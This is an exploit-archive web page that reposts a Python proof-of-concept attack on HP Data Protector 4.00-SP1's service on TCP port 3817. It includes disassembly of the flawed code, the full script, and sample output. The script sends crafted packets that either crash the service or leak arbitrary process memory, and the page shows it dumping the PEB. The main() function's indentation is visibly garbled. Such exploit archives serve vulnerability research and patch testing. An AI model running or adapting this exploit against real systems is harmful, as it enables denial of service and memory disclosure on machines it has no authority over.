首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HP Data Protector 4.00-SP1b43064 Remote Memory Leak/Dos Exploit
来源:www.vfcocus.net 作者:Nibin 发布时间:2009-06-24  
#!/usr/bin/env python

#POC Memory disclosure/ Denial Of Service
#HP Data protector 4.00-sp1 43064
#Tested for Windows Version Only


'''
Buggy code @dpwinsup module of dpwingad process running at 3817/TCP port dpwinsup.10275F80

100DDE89   8B15 54A72210    MOV EDX,DWORD PTR DS:[1022A754] 
100DDE8F   8B82 98650000    MOV EAX,DWORD PTR DS:[EDX+6598]
100DDE95   8B4C24 54        MOV ECX,DWORD PTR SS:[ESP+54] ;ECX = user controlled data
100DDE99   8D1481           LEA EDX,DWORD PTR DS:[ECX+EAX*4] ;EDX = if invalid/valid offset        
100DDE9C   8B3495 F0A42210  MOV ESI,DWORD PTR DS:[EDX*4+1022A4F0] ;Crash/Memory Leak     
100DDEA3   83C4 1C          ADD ESP,1C
100DDEA6   897424 10        MOV DWORD PTR SS:[ESP+10],ESI

'''

import socket
import sys
import struct
import time
import getopt

bf = ("\x54\x84\x00\x00" +
         "\x00\x00\x00\x00" +
         "\x06\x00\x00\x00" +
         "\x92\x00\x00\x00" +
         "data")


ip = '192.168.0.14'
port = 3817
addr = (ip,port)
mem_addr = 0x7ffdf000 #PEB for windows
DEBUG = False


def exploit_memory(ip_addr,read_mem):
    s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip_addr,port))

    reqst = bf.replace("data","A"*130)
    #t = ((addr-1022AC80)/4 - 4)
    t = ((read_mem-0x1022A4F0)/4 - 4)
    print "0x%x" % t

    reqst = reqst[0:32] + struct.pack("<L",t) +  reqst[36:]
    s.send(reqst)
    resp = s.recv(1000)
    leak = struct.unpack("<L",resp[32:36])
    #print type(leak[0])
    if DEBUG:
            print "Len of resp: %d" % len(resp)
            for i in range(0,len(resp)):
                if i % 16 ==0:
                    print
                print "0x%02x" % struct.unpack("<B",resp[i]),
            print

    s.close()
    return leak[0]

def dos_yosemite(ip_addr):
    print "[*] Sending DOS Exploit."
    s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip_addr,port))
    reqst = bf.replace("data","A"*130)
    s.send(reqst)
    #resp = s.recv(1000)
    s.close()

def main():
        try:
            opt, args = getopt.getopt(sys.argv[1:],"ht:e:",["help","target=","exploit="])
    if len(opt)==0:
usage()
sys.exit(0)
except getopt.GetoptError,err:
    print str(err)
    usage()
    sys.exit(2)

for o,a in opt:
if o in ("-h","--help"):
      usage()
      sys.exit()
elif o in ("-e","--exploit"):
for opt_target,arg_target in opt:
if opt_target in ("-t","--target"):
if int(a) == 0: # DoS
                                            dos_yosemite(arg_target)
                                            sys.exit(0)
                                        elif int(a) == 1:
                                            print "[*] Dumping Memory..{PEB}"   
                                            for i in range(0,int(0x50),4): #Poc to read the 80bytes from memory
                                                leak = exploit_memory(arg_target,mem_addr+i)
                                                time.sleep(0.5)
                                                print "0x%08x ---> 0x%08x" % ((mem_addr+i),leak)
                                            sys.exit()
                                        else:
                                            print "[*] Unknown Exploit type"
                                            usage()
                                            sys.exit()
                                else:
                                    print "[*] Target Missing"
                                    usage()
                                    sys.exit()
                               
                else:
                    continue
def usage():
    print "Yosemite DoS and Information Disclosure Exploit"
    #print "Yosemite backup standard v8.7 build 43905 Trial"
    #print "Tested for Windows Versions"
    print "Available Options"
    print "\t -t | --target     target address"
    print "\t -e | --exploit    { 0 - Dos \ 1 - Memory Leak }"
    print "\n"
if __name__=='__main__':
    main()
   
'''
C:\pocs>python poc_yosemite.py -t 192.168.0.14 -e 1
[*] Dumping Memory..{PEB}
0x7ffdf000 ---> 0x0012fbc4
0x7ffdf004 ---> 0x00130000
0x7ffdf008 ---> 0x0012d000
0x7ffdf00c ---> 0x00000000
0x7ffdf010 ---> 0x00001e00
0x7ffdf014 ---> 0x00000000
0x7ffdf018 ---> 0x7ffdf000
0x7ffdf01c ---> 0x00000000
0x7ffdf020 ---> 0x00000c54
0x7ffdf024 ---> 0x00000cfc
0x7ffdf028 ---> 0x00000000
0x7ffdf02c ---> 0x00000000
0x7ffdf030 ---> 0x7ffdb000
0x7ffdf034 ---> 0x00000000
0x7ffdf038 ---> 0x00000000
0x7ffdf03c ---> 0x00000000
0x7ffdf040 ---> 0xe15b42a0
0x7ffdf044 ---> 0x00000000
0x7ffdf048 ---> 0x00000000
0x7ffdf04c ---> 0x00000000

C:\pocs>python poc_yosemite.py -t 192.168.0.14 -e 0
[*] Sending DOS Exploit.
'''

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Zen Cart 1.3.8 Remote SQL Exec
·HP Data Protector 4.00-SP1b430
·Zen Cart 1.3.8 Remote Code Exe
·The Cisco ASA Web VPN versions
·linux/x86 Shellcode Polymorphi
·Bopup Communications Server 3.
·MyBB <= 1.4.6 Remote Code Exec
·Joomla Component com_pinboard
·Multiple HTTP Server Low Bandw
·AlumniServer 1.0.1 (resetpwema
·pmaPWN! - phpMyAdmin Code Inje
·Safari 3.2.3 Arbitrary Code Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved